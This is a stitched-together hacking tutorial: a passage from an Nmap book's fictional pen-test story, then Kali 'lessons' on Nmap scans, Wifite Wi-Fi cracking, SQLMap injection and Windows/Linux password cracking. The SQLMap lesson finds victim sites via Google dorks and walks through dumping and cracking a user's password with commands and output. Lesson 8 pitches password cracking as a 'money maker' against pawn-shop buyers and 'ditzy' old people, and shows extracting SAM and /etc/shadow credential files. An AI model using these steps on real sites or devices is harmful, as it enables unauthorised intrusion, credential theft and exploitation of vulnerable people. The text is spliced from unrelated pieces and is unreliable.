systems and network administrators also find it useful for tasks such as network inventory, managing service 
upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to 
determine what hosts are available on the network, what services (application name and version) those hosts 
are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls 
are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine 
against single hosts. Nmap runs on all major computer operating systems, and both console and graphical 
versions are available. 
This chapter uses fictional stories to provide a broad overview of Nmap and how it is typically used. An 
important legal section helps users avoid (or at least be aware of) controversial usage that could lead to ISP 
account cancellation or even civil and criminal charges. It also discusses the risks of crashing remote machines 
as well as miscellaneous issues such as the open source Nmap license (based on the GNU GPL), and 
copyright. 
Nmap Overview and Demonstration 
Sometimes the best way to understand something is to see it in action. This section includes examples of 
Nmap used in (mostly) fictional yet typical circumstances. Nmap newbies should not expect to understand 
everything at once. This is simply a broad overview of features that are described in depth in later chapters. 
The “solutions” included throughout this book demonstrate many other common Nmap tasks for security 
auditors and network administrators. 
Avatar Online 
Felix dutifully arrives at work on December 15th, although he does not expect many structured tasks. The small 
San Francisco penetration-testing firm he works for has been quiet lately due to impending holidays. Felix 
spends business hours pursuing his latest hobby of building powerful Wi-Fi antennas for wireless assessments 
and war driving exploration. Nevertheless, Felix is hoping for more business. Hacking has been his hobby and 
fascination since a childhood spent learning everything he could about networking, security, Unix, and phone 
systems. Occasionally his curiosity took him too far, and Felix was almost swept up in the 1990 Operation 
Sundevil prosecutions. Fortunately Felix emerged from adolescence without a criminal record, while retaining 
his expert knowledge of security weaknesses. As a professional, he is able to perform the same types of 
network intrusions as before, but with the added benefit of contractual immunity fromprosecution and even a 
paycheck! Rather than keeping his creative exploits secret, he can brag about them to client management 
when presenting his reports. So Felix was not disappointed when his boss interrupted his antenna soldering to 
announce that the sales department closed a pen-testing deal with the Avatar Online gaming company. 
Avatar Online (AO) is a small company working to create the next generation of massive multi-player online 
role-playing games (MMORPGs). Their product, inspired by the Metaverse envisioned in Neil 
Stevenson's Snow Crash, is fascinating but still highly confidential. After witnessing the high-profile leak of 
Valve Software's upcoming game source code, AO quickly hired the security consultants. Felix's task is to 
initiate an external (from outside the firewall) vulnerability assessment while his partners work on physical 
security, source code auditing, social engineering, and so forth. Felix is permitted to exploit any vulnerabilities 
found. 
The first step in a vulnerability assessment is network discovery. This reconnaissance stage determines what 
IP address ranges the target is using, what hosts are available, what services those hosts are offering, general 
network topology details, and what firewall/filtering policies are in effect. 
Determining the IP ranges to scan would normally be an elaborate process involving ARIN (or another 
geographical registry) lookups, DNS queries and zone transfer attempts, various web sleuthing techniques, and 
more. But in this case, Avatar Online explicitly specified what networks they want tested: the corporate network 
on 6.209.24.0/24 and their production/DMZ systems residing on 6.207.0.0/22. Felix checks the IP whois 
records anyway and confirms that these IP ranges are allocated to AO[1]. Felix subconsciously decodes the 
CIDR notation[2] and recognizes this as 1,280 IP addresses. No problem. 
Being the careful type, Felix first starts out with what is known as an Nmap list scan (-sL option). This feature 
simply enumerates every IP address in the given target netblock(s) and does a reverse-DNS lookup (unless -
n was specified) on each. One reason to do this first is stealth. The names of the hosts can hint at potential 
vulnerabilities and allow for a better understanding of the target network, all without raising alarm bells[3]. Felix 
is doing this for another reason—to double-check that the IP ranges are correct. The systems administrator 
who provided the IPs might have made a mistake, and scanning the wrong company would be a disaster. The 
contract signed with Avatar Online may act as a get-out-of-jail-free card for penetrating their networks, but will 
not help if Felix accidentally compromises another company's server! The command he uses and an excerpt of 
the results are shown in Example 1.1 
felix> nmap -sL 6.209.24.0/24 6.207.0.0/22 Starting Nmap ( http://nmap.org ) Nmap scan report for 6.209.24.0 
Nmap scan report for fw.corp.avataronline.com (6.209.24.1) 
Nmap scan report for dev2.corp.avataronline.com (6.209.24.2) 
Nmap scan report for 6.209.24.3 Nmap scan report for 6.209.24.4 ... 
Nmap scan report for dhcp-21.corp.avataronline.com (6.209.24.21) 
Nmap scan report for dhcp-22.corp.avataronline.com (6.209.24.22) 
Nmap scan report for dhcp-23.corp.avataronline.com (6.209.24.23) ... 
Nmap scan report for 
6.207.0.0 Nmap scan report for gw.avataronline.com 
(6.207.0.1) 
Nmap scan report for ns1.avataronline.com (6.207.0.2) 
Nmap scan report for ns2.avataronline.com (6.207.0.3) 
Nmap scan report for ftp.avataronline.com (6.207.0.4) 
Nmap scan report for 6.207.0.5 Nmap scan report for 6.207.0.6 
Nmap scan report for www.avataronline.com (6.207.0.7) 
Nmap scan report for 6.207.0.8 ... Nmap scan report for cluster-c120.avataronline.com (6.207.2.120) 
Nmap scan report for cluster-c121.avataronline.com (6.207.2.121) 
Nmap scan report for cluster-c122.avataronline.com (6.207.2.122) ... 
Nmap scan report for 6.207.3.255 Nmap done: 1280 IP addresses (0 hosts up) scanned in 331.49 seconds 
felix> 
Reading over the results, Felix finds that all of the machines with reverse-DNS entries resolve to Avatar Online. 
No other businesses seem to share the IP space. Moreover, these results give Felix a rough idea of how many 
machines are in use and a good idea of what many are used for. He is now ready to get a bit more intrusive 
and try a port scan. He uses Nmap features that try to determine the application and version number of each 
service listening on the network. He also requests that Nmap try to guess the remote operating system via a 
series of low-level TCP/IP probes known as OS fingerprinting. This sort of scan is not at all stealthy, but that 
does not concern Felix. He is interested in whether the administrators of AO even notice these blatant scans. 
After a bit of consideration, Felix settles on the following command: 
nmap -sS -p- -PE -PP -PS80,443 -PA3389 -PU40125 -A -T4 -oA avatartcpscan-
%D 6.209.24.0/24 6.207.0.0/22 
 
Intro – Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was 
designed to rapidly scan large networks, although it works fine against single hosts. It uses raw IP packets in 
novel ways to determine what hosts are available on the network, what services (application name and version) 
those hosts are offering, what operating systems (and OS versions) they are running, what type 
of packet filters/firewalls are in use, and dozens of other characteristics. While Network Mapper is 
commonly used for security audits, many systems and network administrators find it useful for routine tasks 
such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. 
 
1. How to open nmap 
A. GUI method 
Application → Kali Linux → Information gathering → DNS Analysis → nmap 
 
B. open terminal type nmap hit enter 
 
2. Scan a single IP address When firewall OFF/ON on target PC 
Syntax – nmap IP address/hostname 
EX – nmap 192.168.75.131 
Ex- nmap google.com 
 
3. Boost up Your nmap Scan – using this command u can decrease scan time 
Syntax – nmap –F IP address 
Ex – nmap –F google.com 
 
4. Scan multiple IP address or subnet 
A. scan a range of IP address 
Syntax – nmap IP address range 
EX- nmap 192.168.75.1-131 
 
B. Scan a range of IP address using a wildcard 
Ex – nmap 192.168.75.* 
 
C. Scan an entire subnet 
Ex – nmap 192.168.75.1/24 
 
5. scan turn on OS and version detection 
Ex – nmap –O 192.168.75.131 
 
6. Scan all TCP port in target IP 
Ex – nmap –sT 192.168.75.131 
 
7. Scan a firewall for security weakness 
A. Null scan – TCP Null Scan to fool a firewall to generate a response 
Ex – nmap –sN 192.168.75.131 
 
B. Fin scan – TCP Fin scan to check firewall 
Ex – nmap –sF 192.168.75.131 
 
C. TCP Xmas scan to check firewall 
Ex – nmap –sX 192.168.75.131 
 
8. UDP Scan – Scan a host for UDP services. This scan is used to view open UDP port. 
Ex – nmap –sU 192.168.75.131 
 
9. Scan for IP protocol – This type of scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) 
are supported by target machines. 
Ex – nmap –sO 192.168.75.131 
 
10. detect remote services (server / daemon) version numbers 
Ex – nmap –sV 192.168.75.131 
 
11. Find out the most commonly used TCP ports using TCP SYN Scan 
A. Stealthy scan 
Ex – nmap –sS 192.168.75.131 
 
B. Find out the most commonly used TCP ports using TCP connect scan 
Ex – nmap –sT 192.168.75.131 
 
C. Find out the most commonly used TCP ports using TCP ACK scan 
 Ex – nmap –sA 192.168.75.131 
 
D. Find out the most commonly used TCP ports using TCP Windowscan 
Ex – nmap –sW 192.168.75.131 
 
E. Find out the most commonly used TCP ports using TCP Maimon scan 
Ex – nmap – sM 192.168.75.131 
 
12. List Scan – this command is used tolist target to scan 
Ex – nmap –sL 192.168.75.131 
 
13. Host Discovery or Ping Scan – Scan a network and find out which servers and devices are up and running 
Ex – nmap –sP 192.168.75.0/24 
 
14. Scan a host when protected by the firewall 
Ex – nmap –PN 192.168.75.1 
 
Lesson 6: Wifi Hacking the easy way: Using WIFITE 
 
Wifite 
While the aircrack-ng suite is a well known name in the wireless hacking , the same can't be said about Wifite. 
Living in the shade of the greatness of established aircrack-ng suite, Wifite has finally made a mark in a field 
where aircrack-ng failed. It made wifi hacking everyone's piece of cake. While all its features are not 
independent (eg. it hacks WPS using Reaver), it does what it promises, and puts hacking on autopilot. I'm 
listing some features, before I tell you how to use wifite (which I don't think is necessary at all, as anyone who 
can understand simple English instructions given by Wifite can use it on his own). 
Features Of Wifite 
Sorts targets by signal strength (in dB); cracks closest access points first 
Automatically de-authenticates clients of hidden networks to reveal SSIDs 
Numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc) 
Customizable settings (timeouts, packets/sec, etc)" 
Anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks 
are complete 
All captured WPA handshakes are backed up to wifite.py's current directory 
Smart WPA de-authentication; cycles between all clients and broadcast deauths 
Stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit 
Displays session summary at exit; shows any cracked keys 
All passwords saved to cracked.txt 
Built-in updater: ./wifite.py -upgrade 
I find it worth mentioning here, that not only does it hack wifi the easy way, it also hack in the best possible 
way. 
For example, when you are hacking a WEP wifi using Wifite, it uses fakeauth and uses the ARP Method to 
speed up data packets. 
Hacking WEP network 
wifite -wep 
 
You might even have used the command 
wifite 
 
The -wep makes it clear to wifite that you want to hack WEP wifis only. It'll scan the networks for you, and when 
you think it has scanned enough, you can tell it to stop by typing ctrl+c. It'll then ask you which wifi to hack. In 
my case, I didn't specify -wep so it shows all the wifis in range. 
 You can also select all and then go take a nap (or maybe go to sleep). When you wake up, you might be 
hacking all the wifi passwords in front of you. I typed one and it had gathered 7000 IVs (data packets) 
within 5 mins. Basically you can except it to hack the wifi in 10 mins approx. Notice how it automatically did the 
fake auth and ARP replay. 
Here are a few more screenshots of the working of Wifite, from their official website (./wifite.py is not something 
that should bother you. You can stick with the simple wifite. 
Also, specifying the channel is optional so even the -c 6 was unnecessary. Notice that instead of ARP replay, 
the fragmentation attack was used, using -frag) 
 
 Hacking WPS wasn't fast (it took hours), but it was easy and didn't require you to do anything but wait. 
 
 However, Wifite makes it possible for you to use any method that you want to use, by just naming it. As you 
saw in the screenshot above, the fragmentation attack was carried out just by typing -frag. Similarly, many 
other attacks can be played with. A good idea would be to execute the following- 
wifite -help 
 
This will tell you about the common usage commands, which will be very useful. Here is the list of WEP 
commands for different attacks- 
 WEP 
-wep only target WEP networks [off] 
-pps <num> set the number of packets per second to inject [600] 
-wept <sec> sec to wait for each attack, 0 implies endless [600] 
-chopchop use chopchop attack [on] 
-arpreplay use arpreplay attack [on] 
-fragment use fragmentation attack [on] 
-caffelatte use caffe-latte attack [on] 
-p0841 use -p0841 attack [on] 
-hirte use hirte (cfrag) attack [on] 
-nofakeauth stop attack if fake authentication fails [off] 
-wepca <n> start cracking when number of ivs surpass n [10000] 
-wepsave save a copy of .cap files to this directory [off] 
Troubleshooting 
Wifite quits unexpectedly, sating "Scanning for wireless devices. No wireless interfaces were found. You need 
to plug in a wifi device or install drivers. Quitting." 
You are using Kali inside a virtual machine most probably. Virtual machine does not support internal wireless 
card. Either buy an external wireless card, or do a live boot / side boot with Windows. Anything other than 
Virtual machine in general. 
Lesson 7: Sql Injection using SQLMap 
 
Disclaimer: using this program on any website without permission is illegal. By reading and/or utilizing this 
tutorial you accept sole responsibility for your actions and release Opsec Cybersecurity Solutions LLC and its 
employees from any legal liability for your actions. 
Sql injection is a way of extracting user login info and other data from unsecure sql databases on companies 
servers. It is one of the most common ways sites are hacked. 
What is SQLMAP 
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL 
injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche 
features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, 
over data fetching from the database, to accessing the underlying file system and executing commands on the 
operating system via out-of-band connections. 
 
Features 
Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, 
Firebird, Sybase and SAP MaxDB database management systems. 
Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION 
query, stacked queries and out-of-band. 
Support to directly connect to the database without passing via a SQL injection, by providing DBMS 
credentials, IP address, port and database name. 
Support to enumerate users, password hashes, privileges, roles, databases, tables and columns. 
Automatic recognition of password hash formats and support for cracking them using a dictionary-based 
attack.Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. 
The user can also choose to dump only a range of characters from each column’s entry. 
Support to search for specific database names, specific tables across all databases or specific columns across 
all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials 
where relevant columns’ names contain string like name and pass.Support to download and upload any file 
from the database server underlying file system when the database software is MySQL, PostgreSQL or 
Microsoft SQL Server. 
Support to execute arbitrary commands and retrieve their standard output on the database server underlying 
operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server. 
Support to establish an out-of-band stateful TCP connection between the attacker machine and the database 
server underlying operating system. This channel can be an interactive command prompt, a Meterpreter 
session or a graphical user interface (VNC) session as per user’s choice.Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command. 
[Source: www.sqlmap.org] 
Step 1: Find a Vulnerable Website 
This is usually the toughest bit and takes longer than any other steps. Those who know how to use Google 
Dorks knows this already, but in case you don’t I have put together a number of strings that you can search in 
Google. Just copy paste any of the lines in Google and Google will show you a number of search results. 
 
Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website 
You can google a list of google dork strings 
Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection 
For every google dork string, you will get huundreds of search results. How do you know which is really 
vulnerable to SQLMAP SQL Injection. There’s multiple ways and I am sure people would argue which one is 
best but to me the following is the simplest and most conclusive. 
Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this: 
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 
Just add a single quotation mark ' at the end of the URL. (Just to ensure, " is a double quotation mark and ' is a 
single quotation mark). 
So now your URL will become like this: 
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15' 
If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to 
a different page, move on to the next site in your Google search results page. 
See example error below in the screenshot. I’ve obscured everything including URL and page design for 
obvious reasons. 
Examples of SQLi Errors from Different Databases and Languages 
Microsoft SQL Server 
Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’. 
Description: An unhanded exception occurred during the execution of the current web request. Please review 
the stack trace for more information about the error where it originated in the code. 
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string 
‘attack;’. 
 
MySQL Errors 
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in 
/var/www/myawesomestore.com/buystuff.php on line 12 
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version 
for the right syntax to use near ‘’’ at line 12 
Oracle Errors 
java.sql.SQLException: ORA-00933: SQL command not properly ended at 
oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at 
oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208) 
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated 
 
PostgreSQL Errors 
Query failed: ERROR: unterminated quoted string at or near “‘’’” 
 
Step 2: List DBMS databases using SQLMAP SQL Injection 
As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I 
need to list all the databases in that Vulnerable database. (this is also called enumerating number of columns). 
As I am using SQLMAP, it will also tell me which one is vulnerable. 
 
Run the following command on your vulnerable website with. 
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs 
In here: 
sqlmap = Name of sqlmap binary file 
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15″) 
--dbs = Enumerate DBMS databases 
This commands reveals quite a few interesting info: 
web application technology: Apache back-end DBMS: MySQL 5.0 [10:55:53] [INFO] retrieved: 
information_schema [10:55:56] [INFO] retrieved: sqldummywebsite [10:55:56] [INFO] fetched data logged to 
text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com' 
So, we now have two database that we can look into. information_schema is a standard database for almost 
every MYSQL database. So our interest would be on sqldummywebsitedatabase. 
 
Step 3: List tables of target database using SQLMAP SQL Injection 
Now we need to know how many tables this sqldummywebsite database got and what are their names. To find 
out that information, use the following command: 
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables 
Sweet, this database got 8 tables. 
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite' [10:56:22] [INFO] heuristics detected web 
page charset 'ISO-8859-2' [10:56:22] [INFO] the SQL query used returns 8 entries [10:56:25] [INFO] retrieved: 
item [10:56:27] [INFO] retrieved: link [10:56:30] [INFO] retrieved: other [10:56:32] [INFO] retrieved: picture 
[10:56:34] [INFO] retrieved: picture_tag [10:56:37] [INFO] retrieved: popular_picture [10:56:39] [INFO] 
retrieved: popular_tag [10:56:42] [INFO] retrieved: user_info 
and of course we want to check whats inside user_info table using SQLMAP SQL Injection as that table 
probably contains username and passwords. 
 
Step 4: List columns on target table of selected database using SQLMAP SQL Injection 
Now we need to list all the columns on target table user_info of sqldummywebsitedatabase using SQLMAP 
SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command: 
 
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --
columns 
 
This returns 5 entries from target table user_info of sqldummywebsite database. 
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite' [10:57:18] [INFO] 
heuristics detected web page charset 'ISO-8859-2' [10:57:18] [INFO] the SQL query used returns 5 entries 
[10:57:20] [INFO] retrieved: user_id [10:57:22] [INFO] retrieved: int(10) unsigned [10:57:25] [INFO] retrieved: 
user_login [10:57:27] [INFO] retrieved: varchar(45) [10:57:32] [INFO] retrieved: user_password [10:57:34] 
[INFO] retrieved: varchar(255) [10:57:37] [INFO] retrieved: unique_id [10:57:39] [INFO] retrieved: varchar(255) 
[10:57:41] [INFO] retrieved: record_status [10:57:43] [INFO] retrieved: tinyint(4) 
 
AHA! This is exactly what we are looking for … target table user_login and user_password. 
 
Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL 
Injection 
SQLMAP SQL Injection makes is Easy! Just run the following command again: 
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C 
user_login --dump 
 
Guess what, we now have the username from the database: 
[10:58:39] [INFO] retrieved: userX [10:58:40] [INFO] analyzing table dump for possible password hashes 
 
Almost there, we now only need the password to for this user.. Next shows just that.. 
 
Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL 
Injection 
You’re probably getting used to on how to use SQLMAP SQL Injection tool. Use the following command to 
extract password for the user. 
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C 
user_password --dump 
 
TADA!! We have password. 
[10:59:15] [INFO] the SQL query used returns 1 entries [10:59:17] [INFO] retrieved: 24iYBc17xK0e. [10:59:18] 
[INFO] analyzing table dump for possible password hashes Database: sqldummywebsite Table: user_info [1 
entry] +---------------+ | user_password | +---------------+ | 24iYBc17xK0e. | +---------------+ 
 
But hang on, this password looks funny. This can’t be someone’s password.. Someone who leaves their 
website vulnerable like that just can’t have a password like that. 
That is exactly right.This is a hashed password. What that means, the password is encrypted and now we 
need to decrypt it 
Step 7: Cracking password 
So the hashed password is 24iYBc17xK0e. . How do you know what type of hash is that? 
 
Step 7.a: Identify Hash type 
Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In command 
line type in the following command and on prompt paste the hash value: 
hash-identifier 
 
Excellent. So this is DES(Unix) hash. 
 
Step 7.b: Crack HASH using cudahashcat 
First of all I need to know which code to use for DES hashes. So let’s check that: 
cudahashcat --help | grep DES 
 
So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500. 
I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my 
laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or 
VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in 
Hard Disk. Instructions are in the website, search around. 
I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running: 
cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt 
 
Interesting find: Usuaul Hashcat was unable to determine the code for DES hash. (not in it’s help menu). 
However both cudaHashcat and oclHashcat found and cracked the key. 
Anyhow, so here’s the cracked password: abc123. 
 24iYBc17xK0e.:abc123 
Sweet, we now even have the password for this user. 
 
Lesson 8: Cracking Windows Passwords in Kali Linux 
 
This is probably your number one money maker. Pawn shops whos computer forfeited out and need to be sold, 
to citizens and old people who are just ditzy. Enjoy. 
 
Crack and Reset the system password locally using Kali 
 
Insert the USB Live CD and Boot your PC. Make sure the Boot from USB is the first option in the Boot menu at 
BIOS. 
 
Boot Windows machine with the LiveCD. On the boot menu of Kali Linux, select Live (forensic mode). Kali 
Linux initialize and when it loads, it will open a terminal window and navigate to the Windows password 
database file 
 
 
 
Crack the Windows password with ophcrack: 
 
After loading Live kali linux go to the system menu > ophcrack click ok 
 
Ophcrack uses Rainbow Tables to crack NTLM and LM hashes into plain text, its a free Windows password 
cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of 
the method. If you have a complex password it will take a lot longer than simple passwords, and with the free 
tables your password may never be cracked. 
 
Once the crack is done you will see the password in plain text, write it down and reboot the machine to login. If 
your password isn’t cracked, you can also log in as one of the other users with admin rights and then change 
your password from within Windows. 
 
With the free tables available you will not be able to crack every password, but the paid tables range from $100 
to $1000.Windows uses NTLM hashes to encrypt the password file which gets stored in SAM file. We simply 
need to target this file to retrieve the password 
 
Now you can see the ophcrack application windows. Here, click on Load > Encrypted SAM 
 
After that we need to give the path to SAM directory which is by default /mnt/hda1/WINDOWS/System32 click 
choose 
 
Here we can see the saved hashed now with the username and userid. 
 
 
Now click on Crack button and wait for the password. Its quick and easy 
 
That’s it. It’ll show the password , if you unsuccessfully go with free tables. I downloaded the xp free small and 
the Vista free tables. Once you have downloaded the tables you will need to unzip them in separate folders. I 
made a folder called “hash-tables” and then made 2 more folders within for each table to unzip to. 
 
Run the program and click on “Tables” button. Select the table you downloaded and click “Install”, navigate to 
the folder where you unzipped the table, select it and then click “ok.” You should see green lights next to the 
tables you installed. 
 
 
Reset Windows password with chntpw: 
 
Navigate to the Windows password database file. Almost all versions of windows password is saved in SAM 
file. This file is usually located under /Windows/System32/config. On your system it may look something like 
this: /media/hda1/Windows/System32/config. 
 
The SAM database is usually in the /media/name_of_hard_drive/Windows/System32/config 
 
Type command chntpw -l SAM and it will list out all the usernames that are contained on the Windows system. 
 
#chntpw -l SAM 
The command gives us a list of usernames on the system. When we have the username we want to modify 
and we simply run the command chntpw -u “username” SAM 
 
 
 
In the example below we typed: chntpw -u “Sanjai sathish” SAM and we get the following menu: 
#chntpw -u Sanjai sathish 
 
 
We now have the option of clearing the password, changing the password, or promoting the user to 
administrator. Changing the password does not always work on Windows 7,8 systems. it may works on XP 
system, so it is recommended to clear the password. Therefore you will be able to log in with a blank password. 
You can also promote the user to a local administrator as well. 
 
 
 
Crack the password in Linux using John the ripper: 
 
John the Ripper is a fast password cracker, Its primary purpose is to detect weak Unix passwords. Besides 
several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box 
are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version 
 
John the ripper is a popular dictionary based password cracking tool. It uses a wordlist full of passwords and 
then tries to crack a given password hash using each of the password from the wordlist. In other words its 
called brute force password cracking and is the most basic form of password cracking. It is also the most time 
and cpu consuming technique. More the passwords to try, more the time required. 
 
But still if you want to crack a password locally on your system then john is one of the good tools to try. John is 
in the top 10 security tools in Kali linux. 
 
In this topic i am going to show you, how to use the unshadow command along with john to crack the password 
of users on a linux system. On linux the username/password details are stored in the following 2 files 
 
#/etc/passwd 
#/etc/shadow 
 
The actual password hash is stored in /etc/shadow and this file is accessible on with root access to the 
machine. So try to get this file from your own linux system. Or first create a new user with a simple password. I 
will create a new user on my linux system named happy, with password chess. 
 
Now that our new user is already created its time to crack his password. 
 
#unshadow 
 
The unshadow command will basically combine the data of /etc/passwd and /etc/shadow to create 1 file with 
username and password details. Usage is quite simple. 
 
#unshadow /etc/passwd /etc/shadow > ~/crack 
 
We redirected the output of unshadow command to a new file called crack. 
 
Now this new file shall be cracked by john. For the wordlist we shall be using the password list that comes with 
john on kali linux. It is located at the following path /usr/share/john/password.lst or you can use your own 
password lists too. 
 
#john –wordlist=/usr/share/john/password.lst ~/crack 
Use the “–show” option to display all of the cracked passwords reliably